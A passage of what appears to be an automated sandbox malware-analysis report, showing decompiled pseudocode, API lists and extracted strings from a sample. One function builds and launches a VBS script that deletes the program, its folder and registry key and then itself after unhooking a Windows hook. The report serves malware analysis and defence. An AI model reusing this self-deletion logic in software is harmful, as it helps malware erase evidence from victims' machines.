                                                                                                                                      • Instruction ID: 677d0788f3b52cac8d478d1af17f7e0e02d34837031c7a8cebb37ee7c8dde884
                                                                                                                                      • Opcode Fuzzy Hash: 6a02ac0e01ebce26f0a26bfc8176494fd4f8e7b68d4bc53890c300b4a650eba9
                                                                                                                                      • Instruction Fuzzy Hash: B8C18330A001169EDB16FB7CD9B8BEEB7F96F64608F608059D405A31C2EF746E49C721
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                      			E0130541E() {
                                                                                                                                      				void* _t66;
                                                                                                                                      				void* _t73;
                                                                                                                                      				void* _t76;
                                                                                                                                      				void* _t77;
                                                                                                                                      				void* _t82;
                                                                                                                                      				void* _t83;
                                                                                                                                      				void* _t87;
                                                                                                                                      				void* _t90;
                                                                                                                                      				void* _t91;
                                                                                                                                      				void* _t92;
                                                                                                                                      				void* _t97;
                                                                                                                                      				void* _t99;
                                                                                                                                      				void* _t100;
                                                                                                                                      				void* _t102;
                                                                                                                                      				void* _t106;
                                                                                                                                      				void* _t107;
                                                                                                                                      				void* _t113;
                                                                                                                                      				short* _t114;
                                                                                                                                      				void* _t115;
                                                                                                                                      				void* _t128;
                                                                                                                                      				signed char _t131;
                                                                                                                                      				signed char _t132;
                                                                                                                                      				void* _t195;
                                                                                                                                      				void* _t214;
                                                                                                                                      				void* _t216;
                                                                                                                                      				void* _t217;
                                                                                                                                      				intOrPtr* _t218;
                                                                                                                                      				void* _t219;
                                                                                                                                      
                                                                                                                                      				E01323174(E01323655, _t195, _t219);
                                                                                                                                      				_push(_t128);
                                                                                                                                      				E0130269F(_t128);
                                                                                                                                      				_t66 = E01302709();
                                                                                                                                      				_t220 = _t66;
                                                                                                                                      				if(_t66 != 0) {
                                                                                                                                      					E013070D8(E01302712(0x132fabc, _t220), _t195);
                                                                                                                                      				}
                                                                                                                                      				RegDeleteKeyW(0x80000001, E01302712(0x132f948, _t220));
                                                                                                                                      				_t221 =  *0x132f5b4;
                                                                                                                                      				if( *0x132f5b4 != 0) {
                                                                                                                                      					E0130623E(0x80000001, E01302712(0x132f930, _t221));
                                                                                                                                      				}
                                                                                                                                      				_t222 =  *0x132f5b8;
                                                                                                                                      				if( *0x132f5b8 != 0) {
                                                                                                                                      					E0130623E(0x80000002, E01302712(0x132f930, _t222));
                                                                                                                                      				}
                                                                                                                                      				E0130C510(0, _t216 - 0x2c4, 0, 0x208);
                                                                                                                                      				_t218 = _t217 + 0xc;
                                                                                                                                      				GetModuleFileNameW(0, _t216 - 0x2c4, 0x208);
                                                                                                                                      				_t73 = E01303300();
                                                                                                                                      				_t214 = SetFileAttributesW;
                                                                                                                                      				_t223 = _t73;
                                                                                                                                      				if(_t73 != 0) {
                                                                                                                                      					SetFileAttributesW(E01302712(0x132f918, _t223), 0x80);
                                                                                                                                      				}
                                                                                                                                      				_t131 =  ~(SetFileAttributesW(_t216 - 0x2c4, 0x80));
                                                                                                                                      				asm("sbb bl, bl");
                                                                                                                                      				_t76 = E01306F77(_t216 - 0x88, _t195, _t223);
                                                                                                                                      				 *((intOrPtr*)(_t216 - 4)) = 0;
                                                                                                                                      				_t77 = E0130757A(_t216 - 0x70, _t76, _t223);
                                                                                                                                      				 *((char*)(_t216 - 4)) = 1;
                                                                                                                                      				E013031AE(_t216 - 0xb8, _t77, 0, L".vbs");
                                                                                                                                      				E01302755(_t216 - 0x70, _t77, _t223);
                                                                                                                                      				 *((char*)(_t216 - 4)) = 4;
                                                                                                                                      				E013028AF(_t216 - 0x88, _t77, _t223);
                                                                                                                                      				_t82 = E013027E1(_t216 - 0x58, _t77, E01311D74(_t131, _t216 - 0x88, 0, L"Temp"));
                                                                                                                                      				 *((char*)(_t216 - 4)) = 5;
                                                                                                                                      				_t83 = E013031AE(_t216 - 0x40, _t82, 0, 0x1329c08);
                                                                                                                                      				 *((char*)(_t216 - 4)) = 6;
                                                                                                                                      				E013033AA(_t216 - 0xa0, _t83, 0, _t223, _t216 - 0xb8);
                                                                                                                                      				E01302755(_t216 - 0x40, _t83, _t223);
                                                                                                                                      				 *((char*)(_t216 - 4)) = 9;
                                                                                                                                      				E01302755(_t216 - 0x58, _t83, _t223);
                                                                                                                                      				_t87 = E013027E1(_t216 - 0x88, _t83, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                                                                                                                                      				_t200 = L"On Error Resume Next\n";
                                                                                                                                      				 *((char*)(_t216 - 4)) = 0xa;
                                                                                                                                      				E0130326C(_t216 - 0x28, L"On Error Resume Next\n", _t87);
                                                                                                                                      				 *((char*)(_t216 - 4)) = 0xc;
                                                                                                                                      				E01302755(_t216 - 0x88, L"On Error Resume Next\n", _t223);
                                                                                                                                      				_t132 = _t131 & 0x00000001;
                                                                                                                                      				_t224 = _t132;
                                                                                                                                      				if(_t132 != 0) {
                                                                                                                                      					_t113 = E013027E1(_t216 - 0x70, L"On Error Resume Next\n", _t216 - 0x2c4);
                                                                                                                                      					 *((char*)(_t216 - 4)) = 0xd;
                                                                                                                                      					_t114 = E0130326C(_t216 - 0x40, L"while fso.FileExists(\"", _t113);
                                                                                                                                      					 *((char*)(_t216 - 4)) = 0xe;
                                                                                                                                      					_t200 = _t114;
                                                                                                                                      					 *_t218 = L"\")\n";
                                                                                                                                      					_t115 = E013031AE(_t216 - 0x58, _t114, 0);
                                                                                                                                      					 *((char*)(_t216 - 4)) = 0xf;
                                                                                                                                      					E0130271E(_t216 - 0x28, 0, _t214, _t224, _t115);
                                                                                                                                      					E01302755(_t216 - 0x58, _t114, _t224);
                                                                                                                                      					E01302755(_t216 - 0x40, _t114, _t224);
                                                                                                                                      					 *((char*)(_t216 - 4)) = 0xc;
                                                                                                                                      					E01302755(_t216 - 0x70, _t114, _t224);
                                                                                                                                      				}
                                                                                                                                      				_t90 = E013027E1(_t216 - 0x70, _t200, L"fso.DeleteFile \"");
                                                                                                                                      				 *((char*)(_t216 - 4)) = 0x10;
                                                                                                                                      				_t91 = E013031AE(_t216 - 0x40, _t90, 0, _t216 - 0x2c4);
                                                                                                                                      				 *((char*)(_t216 - 4)) = 0x11;
                                                                                                                                      				 *_t218 = L"\"\n";
                                                                                                                                      				_t92 = E013031AE(_t216 - 0x58, _t91, 0);
                                                                                                                                      				 *((char*)(_t216 - 4)) = 0x12;
                                                                                                                                      				E0130271E(_t216 - 0x28, 0, _t214, _t224, _t92);
                                                                                                                                      				E01302755(_t216 - 0x58, _t91, _t224);
                                                                                                                                      				E01302755(_t216 - 0x40, _t91, _t224);
                                                                                                                                      				 *((char*)(_t216 - 4)) = 0xc;
                                                                                                                                      				E01302755(_t216 - 0x70, _t91, _t224);
                                                                                                                                      				if(_t132 != 0) {
                                                                                                                                      					E01303A48(_t216 - 0x28, 0, L"wend\n");
                                                                                                                                      				}
                                                                                                                                      				_t97 = E01303300();
                                                                                                                                      				_t226 = _t97;
                                                                                                                                      				if(_t97 != 0) {
                                                                                                                                      					_t106 = E01303294(_t216 - 0x40, L"fso.DeleteFolder \"", _t226);
                                                                                                                                      					 *((char*)(_t216 - 4)) = 0x13;
                                                                                                                                      					 *_t218 = L"\"\n";
                                                                                                                                      					_t107 = E013031AE(_t216 - 0x58, _t106, 0, 0x132f918);
                                                                                                                                      					 *((char*)(_t216 - 4)) = 0x14;
                                                                                                                                      					E0130271E(_t216 - 0x28, 0, 0x132f918, _t226, _t107);
                                                                                                                                      					E01302755(_t216 - 0x58, _t106, _t226);
                                                                                                                                      					 *((char*)(_t216 - 4)) = 0xc;
                                                                                                                                      					E01302755(_t216 - 0x40, _t106, _t226);
                                                                                                                                      				}
                                                                                                                                      				E01303A48(_t216 - 0x28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                                                                                                                      				_t99 = E01302712(_t216 - 0xa0, _t226);
                                                                                                                                      				_t100 = E01302709();
                                                                                                                                      				E01302712(_t216 - 0x28, _t226);
                                                                                                                                      				_t102 = E013074EF(_t100 + _t100, _t99, 0);
                                                                                                                                      				_t227 = _t102;
                                                                                                                                      				if(_t102 != 0) {
                                                                                                                                      					ShellExecuteW(0, L"open", E01302712(_t216 - 0xa0, _t227), 0x1329c7c, 0x1329c7c, 0);
                                                                                                                                      				}
                                                                                                                                      				ExitProcess(0);
                                                                                                                                      			}































                                                                                                                                      0x01305423
                                                                                                                                      0x0130542e
                                                                                                                                      0x01305431
                                                                                                                                      0x0130543b
                                                                                                                                      0x01305440
                                                                                                                                      0x01305442
                                                                                                                                      0x0130544b
                                                                                                                                      0x0130544b
                                                                                                                                      0x01305461
                                                                                                                                      0x01305467
                                                                                                                                      0x01305473
                                                                                                                                      0x0130547f
                                                                                                                                      0x01305484
                                                                                                                                      0x01305485
                                                                                                                                      0x0130548c
                                                                                                                                      0x0130549b
                                                                                                                                      0x013054a0
                                                                                                                                      0x013054b1
                                                                                                                                      0x013054b6
                                                                                                                                      0x013054c2
                                                                                                                                      0x013054cf
                                                                                                                                      0x013054d4
                                                                                                                                      0x013054da
                                                                                                                                      0x013054dc
                                                                                                                                      0x013054eb
                                                                                                                                      0x013054eb
                                                                                                                                      0x01305503
                                                                                                                                      0x01305505
                                                                                                                                      0x01305507
                                                                                                                                      0x0130550e
                                                                                                                                      0x01305514
                                                                                                                                      0x01305520
                                                                                                                                      0x0130552a
                                                                                                                                      0x01305533
                                                                                                                                      0x0130553e
                                                                                                                                      0x01305542
                                                                                                                                      0x01305556
                                                                                                                                      0x01305562
                                                                                                                                      0x01305569
                                                                                                                                      0x01305574
                                                                                                                                      0x01305581
                                                                                                                                      0x0130558b
                                                                                                                                      0x01305593
                                                                                                                                      0x01305597
                                                                                                                                      0x013055a7
                                                                                                                                      0x013055ad
                                                                                                                                      0x013055b2
                                                                                                                                      0x013055b9
                                                                                                                                      0x013055c5
                                                                                                                                      0x013055c9
                                                                                                                                      0x013055ce
                                                                                                                                      0x013055ce
                                                                                                                                      0x013055d1
                                                                                                                                      0x013055dd
                                                                                                                                      0x013055e8
                                                                                                                                      0x013055ef
                                                                                                                                      0x013055f4
                                                                                                                                      0x013055fb
                                                                                                                                      0x013055fd
                                                                                                                                      0x01305604
                                                                                                                                      0x0130560e
                                                                                                                                      0x01305612
                                                                                                                                      0x0130561a
                                                                                                                                      0x01305622
                                                                                                                                      0x0130562a
                                                                                                                                      0x0130562e
                                                                                                                                      0x0130562e
                                                                                                                                      0x0130563b
                                                                                                                                      0x01305646
                                                                                                                                      0x01305650
                                                                                                                                      0x01305655
                                                                                                                                      0x0130565e
                                                                                                                                      0x01305665
                                                                                                                                      0x0130566f
                                                                                                                                      0x01305673
                                                                                                                                      0x0130567b
                                                                                                                                      0x01305683
                                                                                                                                      0x0130568b
                                                                                                                                      0x0130568f
                                                                                                                                      0x01305696
                                                                                                                                      0x013056a0
                                                                                                                                      0x013056a0
                                                                                                                                      0x013056ac
                                                                                                                                      0x013056b1
                                                                                                                                      0x013056b3
                                                                                                                                      0x013056be
                                                                                                                                      0x013056c3
                                                                                                                                      0x013056cc
                                                                                                                                      0x013056d3
                                                                                                                                      0x013056dd
                                                                                                                                      0x013056e1
                                                                                                                                      0x013056e9
                                                                                                                                      0x013056f1
                                                                                                                                      0x013056f5
                                                                                                                                      0x013056f5
                                                                                                                                      0x01305702
                                                                                                                                      0x0130570e
                                                                                                                                      0x01305717
                                                                                                                                      0x01305720
                                                                                                                                      0x01305727
                                                                                                                                      0x0130572e
                                                                                                                                      0x01305730
                                                                                                                                      0x0130574c
                                                                                                                                      0x0130574c
                                                                                                                                      0x01305753

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01305423
                                                                                                                                        • Part of subcall function 0130269F: DeleteFileW.KERNEL32(00000000,?,0132F948,0132F948,00000001), ref: 01302674
                                                                                                                                        • Part of subcall function 0130269F: RemoveDirectoryW.KERNEL32(00000000,?,0132F948,0132F948,00000001), ref: 01302694
                                                                                                                                        • Part of subcall function 0130269F: TerminateThread.KERNEL32(Function_000014BC,00000000,00000001,01305436,?,0132F948,00000001), ref: 013026AE
                                                                                                                                        • Part of subcall function 0130269F: UnhookWindowsHookEx.USER32(00020327), ref: 013026BE
                                                                                                                                        • Part of subcall function 0130269F: TerminateThread.KERNEL32(Function_000014A6,00000000,?,0132F948,00000001), ref: 013026D0
                                                                                                                                      • RegDeleteKeyW.ADVAPI32(80000001,00000000), ref: 01305461
                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,0132F948,00000001), ref: 013054C2
                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,0132F948,00000001), ref: 013054EB
                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,0132F948,00000001), ref: 013054F9
                                                                                                                                        • Part of subcall function 013070D8: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,0132F948), ref: 01307135
                                                                                                                                        • Part of subcall function 013070D8: FindNextFileW.KERNELBASE(00000000,?), ref: 01307168
                                                                                                                                        • Part of subcall function 013070D8: RemoveDirectoryW.KERNEL32(?), ref: 013071B6
                                                                                                                                        • Part of subcall function 013070D8: FindClose.KERNEL32(00000000), ref: 01307208
                                                                                                                                        • Part of subcall function 013070D8: RemoveDirectoryW.KERNELBASE(00000000), ref: 0130720F
                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,01329C7C,01329C7C,00000000), ref: 0130574C
                                                                                                                                      • ExitProcess.KERNEL32 ref: 01305753
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$DirectoryFindRemove$AttributesDeleteTerminateThread$CloseExecuteExitFirstH_prologHookModuleNameNextProcessShellUnhookWindows
                                                                                                                                      • String ID: .vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                      • API String ID: 1197752691-726927175
                                                                                                                                      • Opcode ID: a61559fe25a5d1ecd614ec0756ec9498990a94e6403b1e5e2e17c30a8b9e5923
                                                                                                                                      • Instruction ID: bcbe7b986e447ed9ef96503c320ed06cd30b5b4d20e27a31e11951fc77a2240d
                                                                                                                                      • Opcode Fuzzy Hash: a61559fe25a5d1ecd614ec0756ec9498990a94e6403b1e5e2e17c30a8b9e5923
                                                                                                                                      • Instruction Fuzzy Hash: 9A8182319001699EDB1AFBACC868BEEBBF8AF74708F54405CD445632C6EF741A49DB21
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                      			E01319A4C(signed int _a4, signed int _a8) {
                                                                                                                                      				signed int _v0;
                                                                                                                                      				signed char _v5;
                                                                                                                                      				intOrPtr _v8;
                                                                                                                                      				signed char _v9;
                                                                                                                                      				signed int _v12;
                                                                                                                                      				signed int _v16;
                                                                                                                                      				signed int _v20;
                                                                                                                                      				intOrPtr _v24;
                                                                                                                                      				signed int _v44;
                                                                                                                                      				signed int _v92;
                                                                                                                                      				signed int _v128;
                                                                                                                                      				void* __ebx;
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				signed int _t116;
                                                                                                                                      				signed int _t119;
                                                                                                                                      				signed int _t120;
                                                                                                                                      				signed int _t122;
                                                                                                                                      				signed int _t123;
                                                                                                                                      				signed int _t126;
                                                                                                                                      				signed int _t127;
                                                                                                                                      				signed int _t131;
                                                                                                                                      				signed int _t133;
                                                                                                                                      				signed int _t136;
                                                                                                                                      				signed int _t138;
                                                                                                                                      				signed int _t139;
                                                                                                                                      				signed int _t142;
                                                                                                                                      				void* _t143;
                                                                                                                                      				signed int _t148;
                                                                                                                                      				signed int* _t150;
                                                                                                                                      				signed int* _t156;
                                                                                                                                      				signed int _t163;
                                                                                                                                      				signed int _t165;
                                                                                                                                      				signed int _t167;
                                                                                                                                      				intOrPtr _t168;
                                                                                                                                      				signed int _t173;
                                                                                                                                      				signed int _t175;
                                                                                                                                      				signed int _t176;
                                                                                                                                      				signed int _t180;
                                                                                                                                      				signed int _t185;
                                                                                                                                      				intOrPtr* _t186;
                                                                                                                                      				signed int _t191;
                                                                                                                                      				signed int _t196;
                                                                                                                                      				signed int _t197;
                                                                                                                                      				signed int _t204;
                                                                                                                                      				intOrPtr* _t205;
                                                                                                                                      				signed int _t214;
                                                                                                                                      				signed int _t215;
                                                                                                                                      				signed int _t217;
                                                                                                                                      				signed int _t218;
                                                                                                                                      				signed int _t220;
                                                                                                                                      				signed int _t221;
                                                                                                                                      				signed int _t223;
                                                                                                                                      				intOrPtr _t225;
                                                                                                                                      				void* _t231;
                                                                                                                                      				signed int _t233;
                                                                                                                                      				void* _t236;
                                                                                                                                      				signed int _t237;
                                                                                                                                      				signed int _t238;
                                                                                                                                      				void* _t241;
                                                                                                                                      				signed int _t244;
                                                                                                                                      				signed int _t246;
                                                                                                                                      				void* _t252;
                                                                                                                                      				signed int _t253;
                                                                                                                                      				signed int _t254;
                                                                                                                                      				void* _t260;
                                                                                                                                      				void* _t262;
                                                                                                                                      				signed int _t263;
                                                                                                                                      				intOrPtr* _t267;
                                                                                                                                      				intOrPtr* _t271;
                                                                                                                                      				signed int _t274;
                                                                                                                                      				signed int _t276;
                                                                                                                                      				signed int _t280;
                                                                                                                                      				signed int _t282;
                                                                                                                                      				void* _t283;
                                                                                                                                      				void* _t284;
                                                                                                                                      				void* _t285;
                                                                                                                                      				signed int _t286;
                                                                                                                                      				signed int _t288;
                                                                                                                                      				signed int _t290;
                                                                                                                                      				signed int _t291;
                                                                                                                                      				signed int* _t292;
                                                                                                                                      				signed int _t298;
                                                                                                                                      				signed int _t299;
                                                                                                                                      				CHAR* _t300;
                                                                                                                                      				signed int _t302;
                                                                                                                                      				signed int _t303;
                                                                                                                                      				WCHAR* _t304;
                                                                                                                                      				signed int _t305;
                                                                                                                                      				signed int _t306;
                                                                                                                                      				signed int* _t307;
                                                                                                                                      				signed int _t308;
                                                                                                                                      				signed int _t310;
                                                                                                                                      				void* _t316;
                                                                                                                                      				void* _t317;
                                                                                                                                      				void* _t318;
                                                                                                                                      				void* _t320;
                                                                                                                                      				void* _t321;
                                                                                                                                      				void* _t322;
                                                                                                                                      				void* _t323;
                                                                                                                                      
                                                                                                                                      				_t217 = _a4;
                                                                                                                                      				if(_t217 != 0) {
                                                                                                                                      					_t286 = _t217;
                                                                                                                                      					_t116 = E01322F80(_t217, 0x3d);
                                                                                                                                      					_v16 = _t116;
                                                                                                                                      					_t231 = _t285;
                                                                                                                                      					__eflags = _t116;
                                                                                                                                      					if(_t116 == 0) {
                                                                                                                                      						L10:
                                                                                                                                      						 *((intOrPtr*)(E01313CD1())) = 0x16;
                                                                                                                                      						goto L11;
                                                                                                                                      					} else {
                                                                                                                                      						__eflags = _t116 - _t217;
                                                                                                                                      						if(_t116 == _t217) {
                                                                                                                                      							goto L10;
                                                                                                                                      						} else {
                                                                                                                                      							__eflags =  *((char*)(_t116 + 1));
                                                                                                                                      							_t298 =  *0x132f008; // 0x14ce9f8
                                                                                                                                      							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                                                                                                                                      							_v5 = _t120;
                                                                                                                                      							__eflags = _t298 -  *0x132f014; // 0x14ce9f8
                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                      								L87();
                                                                                                                                      								_t298 = _t120;
                                                                                                                                      								_t120 = _v5;
                                                                                                                                      								_t231 = _t298;
                                                                                                                                      								 *0x132f008 = _t298;
                                                                                                                                      							}
                                                                                                                                      							_t218 = 0;
                                                                                                                                      							__eflags = _t298;
                                                                                                                                      							if(_t298 != 0) {
                                                                                                                                      								L21:
                                                                                                                                      								_t233 = _t286;
                                                                                                                                      								_t122 = _v16 - _t233;
                                                                                                                                      								_push(_t122);
                                                                                                                                      								_push(_t233);
                                                                                                                                      								L121();
                                                                                                                                      								_v12 = _t122;
                                                                                                                                      								__eflags = _t122;
                                                                                                                                      								if(_t122 < 0) {
                                                                                                                                      									L29:
                                                                                                                                      									__eflags = _v5 - _t218;
                                                                                                                                      									if(_v5 != _t218) {
                                                                                                                                      										goto L12;
                                                                                                                                      									} else {
                                                                                                                                      										_t123 =  ~_t122;
                                                                                                                                      										_v12 = _t123;
                                                                                                                                      										_t27 = _t123 + 2; // 0x2
                                                                                                                                      										_t236 = _t27;
                                                                                                                                      										__eflags = _t236 - _t123;
                                                                                                                                      										if(_t236 < _t123) {
                                                                                                                                      											goto L11;
                                                                                                                                      										} else {
                                                                                                                                      											__eflags = _t236 - 0x3fffffff;
                                                                                                                                      											if(_t236 >= 0x3fffffff) {
                                                                                                                                      												goto L11;
                                                                                                                                      											} else {
                                                                                                                                      												_push(4);
                                                                                                                                      												_push(_t236);
                                                                                                                                      												_t299 = E0131A0F4(_t298);
                                                                                                                                      												E01314615(_t218);
                                                                                                                                      												_t320 = _t320 + 0x10;
                                                                                                                                      												__eflags = _t299;
                                                                                                                                      												if(_t299 == 0) {
                                                                                                                                      													goto L11;
                                                                                                                                      												} else {
                                                                                                                                      													_t237 = _v12;
                                                                                                                                      													_t286 = _t218;
                                                                                                                                      													_t126 = _a4;
                                                                                                                                      													 *(_t299 + _t237 * 4) = _t126;
                                                                                                                                      													 *(_t299 + 4 + _t237 * 4) = _t218;
                                                                                                                                      													goto L34;
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								} else {
                                                                                                                                      									__eflags =  *_t298 - _t218;
                                                                                                                                      									if( *_t298 == _t218) {
                                                                                                                                      										goto L29;
                                                                                                                                      									} else {
                                                                                                                                      										E01314615( *((intOrPtr*)(_t298 + _t122 * 4)));
                                                                                                                                      										_t282 = _v12;
                                                                                                                                      										__eflags = _v5 - _t218;
                                                                                                                                      										if(_v5 != _t218) {
                                                                                                                                      											while(1) {
                                                                                                                                      												__eflags =  *(_t298 + _t282 * 4) - _t218;
                                                                                                                                      												if( *(_t298 + _t282 * 4) == _t218) {
                                                                                                                                      													break;
                                                                                                                                      												}
                                                                                                                                      												_t19 = _t282 * 4; // 0x14d5df8
                                                                                                                                      												 *(_t298 + _t282 * 4) =  *(_t298 + _t19 + 4);
                                                                                                                                      												_t282 = _t282 + 1;
                                                                                                                                      												__eflags = _t282;
                                                                                                                                      											}
                                                                                                                                      											_push(4);
                                                                                                                                      											_push(_t282);
                                                                                                                                      											_t299 = E0131A0F4(_t298);
                                                                                                                                      											E01314615(_t218);
                                                                                                                                      											_t320 = _t320 + 0x10;
                                                                                                                                      											_t126 = _t286;
                                                                                                                                      											__eflags = _t299;
                                                                                                                                      											if(_t299 != 0) {
                                                                                                                                      												L34:
                                                                                                                                      												 *0x132f008 = _t299;
                                                                                                                                      											}
                                                                                                                                      										} else {
                                                                                                                                      											_t126 = _a4;
                                                                                                                                      											_t286 = _t218;
                                                                                                                                      											 *(_t298 + _t282 * 4) = _t126;
                                                                                                                                      										}
                                                                                                                                      										__eflags = _a8 - _t218;
                                                                                                                                      										if(_a8 == _t218) {
                                                                                                                                      											goto L12;
                                                                                                                                      										} else {
                                                                                                                                      											_t238 = _t126;
                                                                                                                                      											_t283 = _t238 + 1;
                                                                                                                                      											do {
                                                                                                                                      												_t127 =  *_t238;
                                                                                                                                      												_t238 = _t238 + 1;
                                                                                                                                      												__eflags = _t127;
                                                                                                                                      											} while (_t127 != 0);
                                                                                                                                      											_v12 = _t238 - _t283 + 2;
                                                                                                                                      											_t300 = E013145B8(_t238 - _t283, _t238 - _t283 + 2, 1);
                                                                                                                                      											_pop(_t241);
                                                                                                                                      											__eflags = _t300;
                                                                                                                                      											if(_t300 == 0) {
                                                                                                                                      												L42:
                                                                                                                                      												E01314615(_t300);
                                                                                                                                      												goto L12;
                                                                                                                                      											} else {
                                                                                                                                      												_t131 = E01313AEF(_t300, _v12, _a4);
                                                                                                                                      												_t321 = _t320 + 0xc;
                                                                                                                                      												__eflags = _t131;
                                                                                                                                      												if(_t131 != 0) {
                                                                                                                                      													_push(_t218);
                                                                                                                                      													_push(_t218);
                                                                                                                                      													_push(_t218);
                                                                                                                                      													_push(_t218);
                                                                                                                                      													_push(_t218);
                                                                                                                                      													E013110E6();
                                                                                                                                      													asm("int3");
                                                                                                                                      													_t316 = _t321;
                                                                                                                                      													_t322 = _t321 - 0xc;
                                                                                                                                      													_push(_t218);
                                                                                                                                      													_t220 = _v44;
                                                                                                                                      													__eflags = _t220;
                                                                                                                                      													if(_t220 != 0) {
                                                                                                                                      														_push(_t300);
                                                                                                                                      														_push(_t286);
                                                                                                                                      														_push(0x3d);
                                                                                                                                      														_t288 = _t220;
                                                                                                                                      														_t133 = E013230AB(_t241);
                                                                                                                                      														_v20 = _t133;
                                                                                                                                      														_t244 = _t220;
                                                                                                                                      														__eflags = _t133;
                                                                                                                                      														if(_t133 == 0) {
                                                                                                                                      															L54:
                                                                                                                                      															 *((intOrPtr*)(E01313CD1())) = 0x16;
                                                                                                                                      															goto L55;
                                                                                                                                      														} else {
                                                                                                                                      															__eflags = _t133 - _t220;
                                                                                                                                      															if(_t133 == _t220) {
                                                                                                                                      																goto L54;
                                                                                                                                      															} else {
                                                                                                                                      																_t302 =  *0x132f00c; // 0x14e5a30
                                                                                                                                      																_t221 = 0;
                                                                                                                                      																__eflags =  *(_t133 + 2);
                                                                                                                                      																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                                                                                                                                      																_v9 = _t246;
                                                                                                                                      																__eflags = _t302 -  *0x132f010; // 0x14ced10
                                                                                                                                      																if(__eflags == 0) {
                                                                                                                                      																	_push(_t302);
                                                                                                                                      																	L104();
                                                                                                                                      																	_t246 = _v9;
                                                                                                                                      																	_t302 = _t133;
                                                                                                                                      																	 *0x132f00c = _t302;
                                                                                                                                      																}
                                                                                                                                      																__eflags = _t302;
                                                                                                                                      																if(_t302 != 0) {
                                                                                                                                      																	L64:
                                                                                                                                      																	_v20 = _v20 - _t288 >> 1;
                                                                                                                                      																	_t138 = E0131A087(_t288, _v20 - _t288 >> 1);
                                                                                                                                      																	_v16 = _t138;
                                                                                                                                      																	__eflags = _t138;
                                                                                                                                      																	if(_t138 < 0) {
                                                                                                                                      																		L72:
                                                                                                                                      																		__eflags = _v9 - _t221;
                                                                                                                                      																		if(_v9 != _t221) {
                                                                                                                                      																			goto L56;
                                                                                                                                      																		} else {
                                                                                                                                      																			_t139 =  ~_t138;
                                                                                                                                      																			_v16 = _t139;
                                                                                                                                      																			_t72 = _t139 + 2; // 0x2
                                                                                                                                      																			_t252 = _t72;
                                                                                                                                      																			__eflags = _t252 - _t139;
                                                                                                                                      																			if(_t252 < _t139) {
                                                                                                                                      																				goto L55;
                                                                                                                                      																			} else {
                                                                                                                                      																				__eflags = _t252 - 0x3fffffff;
                                                                                                                                      																				if(_t252 >= 0x3fffffff) {
                                                                                                                                      																					goto L55;
                                                                                                                                      																				} else {
                                                                                                                                      																					_push(4);
                                                                                                                                      																					_push(_t252);
                                                                                                                                      																					_t303 = E0131A0F4(_t302);
                                                                                                                                      																					E01314615(_t221);
                                                                                                                                      																					_t322 = _t322 + 0x10;
                                                                                                                                      																					__eflags = _t303;
                                                                                                                                      																					if(_t303 == 0) {
                                                                                                                                      																						goto L55;
                                                                                                                                      																					} else {
                                                                                                                                      																						_t253 = _v16;
                                                                                                                                      																						_t288 = _t221;
                                                                                                                                      																						_t142 = _v0;
                                                                                                                                      																						 *(_t303 + _t253 * 4) = _t142;
                                                                                                                                      																						 *(_t303 + 4 + _t253 * 4) = _t221;
                                                                                                                                      																						goto L77;
                                                                                                                                      																					}
                                                                                                                                      																				}
                                                                                                                                      																			}
                                                                                                                                      																		}
                                                                                                                                      																	} else {
                                                                                                                                      																		__eflags =  *_t302 - _t221;
                                                                                                                                      																		if( *_t302 == _t221) {
                                                                                                                                      																			goto L72;
                                                                                                                                      																		} else {
                                                                                                                                      																			E01314615( *((intOrPtr*)(_t302 + _t138 * 4)));
                                                                                                                                      																			_t276 = _v16;
                                                                                                                                      																			__eflags = _v9 - _t221;
                                                                                                                                      																			if(_v9 != _t221) {
                                                                                                                                      																				while(1) {
                                                                                                                                      																					__eflags =  *(_t302 + _t276 * 4) - _t221;
                                                                                                                                      																					if( *(_t302 + _t276 * 4) == _t221) {
                                                                                                                                      																						break;
                                                                                                                                      																					}
                                                                                                                                      																					_t64 = _t276 * 4; // 0x14e6b98
                                                                                                                                      																					 *(_t302 + _t276 * 4) =  *(_t302 + _t64 + 4);
                                                                                                                                      																					_t276 = _t276 + 1;
                                                                                                                                      																					__eflags = _t276;
                                                                                                                                      																				}
                                                                                                                                      																				_push(4);
                                                                                                                                      																				_push(_t276);
                                                                                                                                      																				_t303 = E0131A0F4(_t302);
                                                                                                                                      																				E01314615(_t221);
                                                                                                                                      																				_t322 = _t322 + 0x10;
                                                                                                                                      																				_t142 = _t288;
